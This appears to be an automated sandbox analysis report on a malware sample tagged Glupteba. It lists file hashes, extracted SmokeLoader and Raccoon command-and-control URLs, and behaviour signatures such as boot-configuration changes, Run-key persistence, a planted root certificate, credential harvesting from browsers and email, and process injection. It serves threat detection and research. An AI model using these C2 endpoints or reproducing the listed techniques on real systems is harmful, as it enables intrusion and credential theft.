glupteba | 3da207e9b649dce2596dcb3bf7c1572e1eeb205179b3a12f61e67932063359da

Target

521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe
Size

192KB
MD5

1e318119fdcd8c3541ec26be8c78684b
SHA1

a918d02af23a41f245b53a69b8be0faae6b9580b
SHA256

521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1
SHA512

fc8a0ff6b11a39d5521a47becb8a2f23810c267bb31cc6daffe6250292de8351eacf7640e4fd79c7055756ef7a72befc63314eee14bf4503068aff260e1c829c

Malware Config

Extracted

Family

smokeloader

Version

2020

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://4zavr.com/upload/

http://zynds.com/upload/

http://atvua.com/upload/

http://detse.net/upload/

http://dsdett.com/upload/

http://dtabasee.com/upload/

http://yeronogles.monster/upload/

http://venosur.top/

http://nabudar.top/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Extracted

Family

raccoon

Botnet

6ac5fccfac0efc9d52c33f25b8d248e95427bcd9

Attributes

url4cnc
https://telete.in/o23felk0s

rc4.plain

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4452-79-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba
behavioral2/memory/4452-82-0x00000000012B0000-0x0000000001AB2000-memory.dmp	family_glupteba
behavioral2/memory/4452-86-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1264-24-0x00000000048A0000-0x00000000048CE000-memory.dmp	family_redline
behavioral2/memory/1264-27-0x0000000007650000-0x000000000767C000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Modifies boot configuration data using bcdedit 15 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
6052	bcdedit.exe
7396	bcdedit.exe
6116	bcdedit.exe
4080	bcdedit.exe
6300	bcdedit.exe
6836	bcdedit.exe
5664	bcdedit.exe
6520	bcdedit.exe
6396	bcdedit.exe
7044	bcdedit.exe
5640	bcdedit.exe
6788	bcdedit.exe
6808	bcdedit.exe
7176	bcdedit.exe
6976	bcdedit.exe

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5812-241-0x0000000000A00000-0x0000000000AF1000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Drops file in Drivers directory 1 IoCs

Processes:

def.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts def.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	def.exe

Executes dropped EXE 22 IoCs

Processes:

B56B.exeBB48.exeBCEF.exeC915.exeCA6E.exeotdysebd.exeD1B2.exeCA6E.exejfiag3g_gg.exeDB68.exeDEB4.exeDEB4.tmpE4B1.exedef.exejfiag3g_gg.exeE9D2.exeF08A.exeF34A.exeprolab.exeSebyjaseku.exeprolab.tmpmd7_7dfj.exe

pid	process
3300	B56B.exe
1264	BB48.exe
1476	BCEF.exe
4424	C915.exe
4532	CA6E.exe
3660	otdysebd.exe
4476	D1B2.exe
196	CA6E.exe
4692	jfiag3g_gg.exe
4452	DB68.exe
3864	DEB4.exe
724	DEB4.tmp
960	E4B1.exe
388	def.exe
1424	jfiag3g_gg.exe
2888	E9D2.exe
4772	F08A.exe
1488	F34A.exe
3644	prolab.exe
4768	Sebyjaseku.exe
3096	prolab.tmp
6752	md7_7dfj.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
behavioral2/memory/8536-251-0x0000000000400000-0x0000000000897000-memory.dmp	upx

Deletes itself 1 IoCs

Processes:

pid process

2552

pid	process
2552

Loads dropped DLL 10 IoCs

Processes:

521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exeCA6E.exeDEB4.tmpE4B1.exeF08A.exe

pid	process
4764	521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe
196	CA6E.exe
724	DEB4.tmp
960	E4B1.exe
4772	F08A.exe
4772	F08A.exe
4772	F08A.exe
4772	F08A.exe
4772	F08A.exe
4772	F08A.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

4832 icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4832	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

D1B2.exedef.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	D1B2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Nuguxizhoqa.exe\""	def.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

C915.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C915.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

28 ip-api.com
361 api.2ip.ua
362 api.2ip.ua
Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	C915.exe

flow	ioc
28	ip-api.com
361	api.2ip.ua
362	api.2ip.ua

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

CA6E.exeotdysebd.exe

description	pid	process	target process
PID 4532 set thread context of 196	4532	CA6E.exe	CA6E.exe
PID 3660 set thread context of 3928	3660	otdysebd.exe	svchost.exe

Drops file in Program Files directory 24 IoCs

Processes:

prolab.tmpdef.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Picture Lab\DockingToolbar.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceGrid2.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-GVS21.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-G6D1J.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-3K08U.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Math.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\Pictures Lab.exe	prolab.tmp
File created	C:\Program Files (x86)\Windows Mail\Nuguxizhoqa.exe.config	def.exe
File created	C:\Program Files (x86)\Picture Lab\is-98I7J.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-4TMQT.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-8BMTN.tmp	prolab.tmp
File created	C:\Program Files\Windows Defender\MJZQZMALRA\prolab.exe	def.exe
File created	C:\Program Files (x86)\Windows Mail\Nuguxizhoqa.exe	def.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-C19HD.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Imaging.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-LS2DP.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-1JIUG.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-A94IM.tmp	prolab.tmp
File created	C:\Program Files\Windows Defender\MJZQZMALRA\prolab.exe.config	def.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceLibrary.dll	prolab.tmp

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 50 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4648	4452	WerFault.exe	DB68.exe
4624	4452	WerFault.exe	DB68.exe
4260	4452	WerFault.exe	DB68.exe
2784	4452	WerFault.exe	DB68.exe
4244	4452	WerFault.exe	DB68.exe
684	4452	WerFault.exe	DB68.exe
2892	4452	WerFault.exe	DB68.exe
1676	4452	WerFault.exe	DB68.exe
3724	4452	WerFault.exe	DB68.exe
1040	4452	WerFault.exe	DB68.exe
5744	4452	WerFault.exe	DB68.exe
6228	4452	WerFault.exe	DB68.exe
4788	4452	WerFault.exe	DB68.exe
5672	4452	WerFault.exe	DB68.exe
8132	4452	WerFault.exe	DB68.exe
496	4452	WerFault.exe	DB68.exe
8540	4452	WerFault.exe	DB68.exe
8684	4452	WerFault.exe	DB68.exe
9000	4452	WerFault.exe	DB68.exe
512	4512	WerFault.exe	DB68.exe
212	4512	WerFault.exe	DB68.exe
5124	4512	WerFault.exe	DB68.exe
5456	4512	WerFault.exe	DB68.exe
5696	4512	WerFault.exe	DB68.exe
5920	4512	WerFault.exe	DB68.exe
6080	4512	WerFault.exe	DB68.exe
6212	4512	WerFault.exe	DB68.exe
6868	4512	WerFault.exe	DB68.exe
7080	4512	WerFault.exe	DB68.exe
7692	4512	WerFault.exe	DB68.exe
8060	8944	WerFault.exe	csrss.exe
3624	8944	WerFault.exe	csrss.exe
4360	8944	WerFault.exe	csrss.exe
5320	8944	WerFault.exe	csrss.exe
5808	8944	WerFault.exe	csrss.exe
4880	8944	WerFault.exe	csrss.exe
5316	8944	WerFault.exe	csrss.exe
5780	8944	WerFault.exe	csrss.exe
7336	8944	WerFault.exe	csrss.exe
6128	8944	WerFault.exe	csrss.exe
6248	8944	WerFault.exe	csrss.exe
6668	8944	WerFault.exe	csrss.exe
7136	8944	WerFault.exe	csrss.exe
7488	8944	WerFault.exe	csrss.exe
7812	8944	WerFault.exe	csrss.exe
8212	8944	WerFault.exe	csrss.exe
8584	8944	WerFault.exe	csrss.exe
7528	8944	WerFault.exe	csrss.exe
8100	8944	WerFault.exe	csrss.exe
8220	8944	WerFault.exe	csrss.exe

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

CA6E.exeE4B1.exe521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CA6E.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	E4B1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CA6E.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CA6E.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	E4B1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	E4B1.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

6776 schtasks.exe
7260 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

8560 timeout.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exeTASKKILL.exe

pid process

1104 taskkill.exe
5440 taskkill.exe
8840 TASKKILL.exe

pid	process
6776	schtasks.exe
7260	schtasks.exe

pid	process
8560	timeout.exe

pid	process
1104	taskkill.exe
5440	taskkill.exe
8840	TASKKILL.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Buses	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = bcd8273e236c560524edb47d450dd49d084297dce82e72baa46d34fdc48d541d544a2e1584cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda5691cd48548743fe0ae644490bdb67525e99d590dcdf38d3c74bbc4103d32f5a16512dd854c740db8f2054991cfdb2470dd976d5d8dc4b5622dd79d420530ff942e569beb092d60b19d561ccc89b47d2dea9c6d5892a7ec384290c4195804fca0651ddc814d7639e39d800dd5bcacecd685a46d34fdc58d541d93c206565bbee62b24edb47d440dd49d652a499fc14d14dda46ef8efc78d541de59c4c082affa1690adc8d4d6a3fe5a5642df4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de44e753d04	svchost.exe

Modifies registry class 2 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

E9D2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	E9D2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	E9D2.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

8888 regedit.exe
5492 regedit.exe

pid	process
8888	regedit.exe
5492	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe

pid	process
4764	521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe
4764	521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552
2552

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2552
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exeCA6E.exeE4B1.exe

pid process

4764 521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe
196 CA6E.exe
960 E4B1.exe

pid	process
2552

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

C915.exeBB48.exedef.exetaskkill.exeSebyjaseku.exe

description	pid	process
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeManageVolumePrivilege	4424	C915.exe
Token: SeManageVolumePrivilege	4424	C915.exe
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeDebugPrivilege	1264	BB48.exe
Token: SeDebugPrivilege	388	def.exe
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeDebugPrivilege	1104	taskkill.exe
Token: SeManageVolumePrivilege	4424	C915.exe
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeDebugPrivilege	4768	Sebyjaseku.exe
Token: SeShutdownPrivilege	2552
Token: SeCreatePagefilePrivilege	2552
Token: SeShutdownPrivilege	2552

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

prolab.tmp

pid process

3096 prolab.tmp

pid	process
3096	prolab.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

B56B.execmd.exeBCEF.exeCA6E.exeD1B2.exeotdysebd.exe

description	pid	process	target process
PID 2552 wrote to memory of 3300	2552		B56B.exe
PID 2552 wrote to memory of 3300	2552		B56B.exe
PID 2552 wrote to memory of 3300	2552		B56B.exe
PID 3300 wrote to memory of 860	3300	B56B.exe	cmd.exe
PID 3300 wrote to memory of 860	3300	B56B.exe	cmd.exe
PID 3300 wrote to memory of 860	3300	B56B.exe	cmd.exe
PID 3300 wrote to memory of 8	3300	B56B.exe	cmd.exe
PID 3300 wrote to memory of 8	3300	B56B.exe	cmd.exe
PID 3300 wrote to memory of 8	3300	B56B.exe	cmd.exe
PID 8 wrote to memory of 1256	8	cmd.exe	cmd.exe
PID 8 wrote to memory of 1256	8	cmd.exe	cmd.exe
PID 8 wrote to memory of 1256	8	cmd.exe	cmd.exe
PID 2552 wrote to memory of 1264	2552		BB48.exe
PID 2552 wrote to memory of 1264	2552		BB48.exe
PID 2552 wrote to memory of 1264	2552		BB48.exe
PID 2552 wrote to memory of 1476	2552		BCEF.exe
PID 2552 wrote to memory of 1476	2552		BCEF.exe
PID 2552 wrote to memory of 1476	2552		BCEF.exe
PID 1476 wrote to memory of 1192	1476	BCEF.exe	cmd.exe
PID 1476 wrote to memory of 1192	1476	BCEF.exe	cmd.exe
PID 1476 wrote to memory of 1192	1476	BCEF.exe	cmd.exe
PID 1476 wrote to memory of 2532	1476	BCEF.exe	cmd.exe
PID 1476 wrote to memory of 2532	1476	BCEF.exe	cmd.exe
PID 1476 wrote to memory of 2532	1476	BCEF.exe	cmd.exe
PID 1476 wrote to memory of 2848	1476	BCEF.exe	sc.exe
PID 1476 wrote to memory of 2848	1476	BCEF.exe	sc.exe
PID 1476 wrote to memory of 2848	1476	BCEF.exe	sc.exe
PID 2552 wrote to memory of 4424	2552		C915.exe
PID 2552 wrote to memory of 4424	2552		C915.exe
PID 2552 wrote to memory of 4424	2552		C915.exe
PID 1476 wrote to memory of 1780	1476	BCEF.exe	sc.exe
PID 1476 wrote to memory of 1780	1476	BCEF.exe	sc.exe
PID 1476 wrote to memory of 1780	1476	BCEF.exe	sc.exe
PID 2552 wrote to memory of 4532	2552		CA6E.exe
PID 2552 wrote to memory of 4532	2552		CA6E.exe
PID 2552 wrote to memory of 4532	2552		CA6E.exe
PID 1476 wrote to memory of 4544	1476	BCEF.exe	sc.exe
PID 1476 wrote to memory of 4544	1476	BCEF.exe	sc.exe
PID 1476 wrote to memory of 4544	1476	BCEF.exe	sc.exe
PID 1476 wrote to memory of 4716	1476	BCEF.exe	netsh.exe
PID 1476 wrote to memory of 4716	1476	BCEF.exe	netsh.exe
PID 1476 wrote to memory of 4716	1476	BCEF.exe	netsh.exe
PID 4532 wrote to memory of 196	4532	CA6E.exe	CA6E.exe
PID 4532 wrote to memory of 196	4532	CA6E.exe	CA6E.exe
PID 4532 wrote to memory of 196	4532	CA6E.exe	CA6E.exe
PID 4532 wrote to memory of 196	4532	CA6E.exe	CA6E.exe
PID 4532 wrote to memory of 196	4532	CA6E.exe	CA6E.exe
PID 4532 wrote to memory of 196	4532	CA6E.exe	CA6E.exe
PID 2552 wrote to memory of 4476	2552		D1B2.exe
PID 2552 wrote to memory of 4476	2552		D1B2.exe
PID 2552 wrote to memory of 4476	2552		D1B2.exe
PID 4476 wrote to memory of 4692	4476	D1B2.exe	jfiag3g_gg.exe
PID 4476 wrote to memory of 4692	4476	D1B2.exe	jfiag3g_gg.exe
PID 4476 wrote to memory of 4692	4476	D1B2.exe	jfiag3g_gg.exe
PID 3660 wrote to memory of 3928	3660	otdysebd.exe	svchost.exe
PID 3660 wrote to memory of 3928	3660	otdysebd.exe	svchost.exe
PID 3660 wrote to memory of 3928	3660	otdysebd.exe	svchost.exe
PID 3660 wrote to memory of 3928	3660	otdysebd.exe	svchost.exe
PID 3660 wrote to memory of 3928	3660	otdysebd.exe	svchost.exe
PID 2552 wrote to memory of 4452	2552		DB68.exe
PID 2552 wrote to memory of 4452	2552		DB68.exe
PID 2552 wrote to memory of 4452	2552		DB68.exe
PID 2552 wrote to memory of 3864	2552		DEB4.exe
PID 2552 wrote to memory of 3864	2552		DEB4.exe

